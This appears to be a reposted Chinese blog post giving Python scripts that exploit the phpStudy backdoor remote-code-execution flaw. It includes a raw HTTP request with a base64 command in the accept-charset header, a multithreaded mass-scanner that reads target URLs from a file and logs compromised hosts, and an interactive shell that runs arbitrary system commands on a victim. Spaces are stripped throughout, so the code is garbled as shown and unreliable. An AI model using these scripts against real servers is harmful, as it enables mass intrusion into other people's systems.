phpstudy后门rce批量利用脚本的实现
写两个一个批量检测的一个交互式shell的
暂时py图形化的qt写出来..有点问题
后门包:
GET/HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:55.0)Gecko/20100101Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection:close
accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding:gzip,deflate
Upgrade-Insecure-Requests:1
执行那段写shell即可
晚上抽点空简单写个发包的py:
#!/usr/bin/envpython3
#-*-encoding:utf-8-*-
#卿博客:https://www.cnblogs.com/-qing-/
importbase64
importrequests
importthreading
importqueue
print("======PhpstudyBackdoorExploit============\n")
print("===========ByQing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
payload="echo\"qing\";"
payload=base64.b64encode(payload.encode('utf-8'))
payload=str(payload,'utf-8')
headers={
'Upgrade-Insecure-Requests':'1',
'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language':'zh-CN,zh;q=0.9',
'accept-charset':payload,
'Accept-Encoding':'gzip,deflate',
'Connection':'close',
}
defwrite_shell(url,headers):
try:
r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30)
if"qing"inr.text:
print('[+]BackDoorsuccessful:'+url+'===============[+]\n')
withopen('success.txt','a')asf:
f.write(url+'\n')
else:
print('[-]BackDoorfailed:'+url+'[-]\n')
except:
print('[-]Timeout:'+url+'[-]\n')
url="http://xxx"
write_shell(url=url,headers=headers)
界面优化、改下多线程、批量读取文本文件后的代码:
#!/usr/bin/envpython3
#-*-encoding:utf-8-*-
#卿博客:https://www.cnblogs.com/-qing-/
importbase64
importrequests
importthreading
importthreadpool
print("======PhpstudyBackdoorExploit============\n")
print("===========ByQing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
defwrite_shell(url):
payload="echo\"qing\";"
payload=base64.b64encode(payload.encode('utf-8'))
payload=str(payload,'utf-8')
headers={
'Upgrade-Insecure-Requests':'1',
'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language':'zh-CN,zh;q=0.9',
'accept-charset':payload,
'Accept-Encoding':'gzip,deflate',
'Connection':'close',
}
try:
r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30)
if"qing"inr.text:
print('[+]BackDoorsuccessful:'+url+'===============[+]\n')
withopen('success.txt','a')asf:
f.write(url+'\n')
else:
print('[-]BackDoorfailed:'+url+'[-]\n')
except:
print('[-]Timeout:'+url+'[-]\n')
#url="http://xxx"
#write_shell(url=url,headers=headers)
defmain():
withopen('url.txt','r')asf:
lines=f.read().splitlines()
task_pool=threadpool.ThreadPool(5)
requests=threadpool.makeRequests(write_shell,lines)
forreqinrequests:
task_pool.putRequest(req)
task_pool.wait()
if__name__=='__main__':
main()
#线程队列部分
#th=[]
#th_num=10
#forxinrange(th_num):
#t=threading.Thread(target=write_shell)
#th.append(t)
#forxinrange(th_num):
#th[x].start()
#forxinrange(th_num):
#th[x].join()
你也可以加上读取php文件的字典这个简单没啥说的
下一个是交互式shell
#!/usr/bin/envpython3
#-*-encoding:utf-8-*-
#卿博客:https://www.cnblogs.com/-qing-/
importbase64
importrequests
importthreading
importthreadpool
importre
print("======PhpstudyBackdoorExploit---os-shell============\n")
print("===========ByQing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
defos_shell(url,headers,payload):
try:
r=requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
#print(r.text)
res=re.findall("qing(.*?)qing",r.text,re.S)
print("[+]===========TheResponse:==========[+]\n")
res="".join(res)
print(res)
except:
print("[-]===========Failed!Timeout...==========[-]\n")
defmain():
url=input("inputtheUrl,example:\"http://127.0.0.1/\"\n")
payload=input("inputthepayload,default:echosystem(\"whoami\");\n")
de_payload="echo\"qing\";system(\"whoami\");echo\"qing\";"
ifpayload.strip()=='':
payload=de_payload
payload="echo\"qing\";"+payload+"echo\"qing\";"
payload=base64.b64encode(payload.encode('utf-8'))
payload=str(payload,'utf-8')
headers={
'Upgrade-Insecure-Requests':'1',
'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Language':'zh-CN,zh;q=0.9',
'accept-charset':payload,
'Accept-Encoding':'gzip,deflate',
'Connection':'close',
}
os_shell(url=url,headers=headers,payload=payload)
if__name__=='__main__':
main()
声明:本文内容来源于网络,版权归原作者所有,内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:czq8825#qq.com(发邮件时,请将#更换为@)进行举报,并提供相关证据,一经查实,本站将立刻删除涉嫌侵权内容。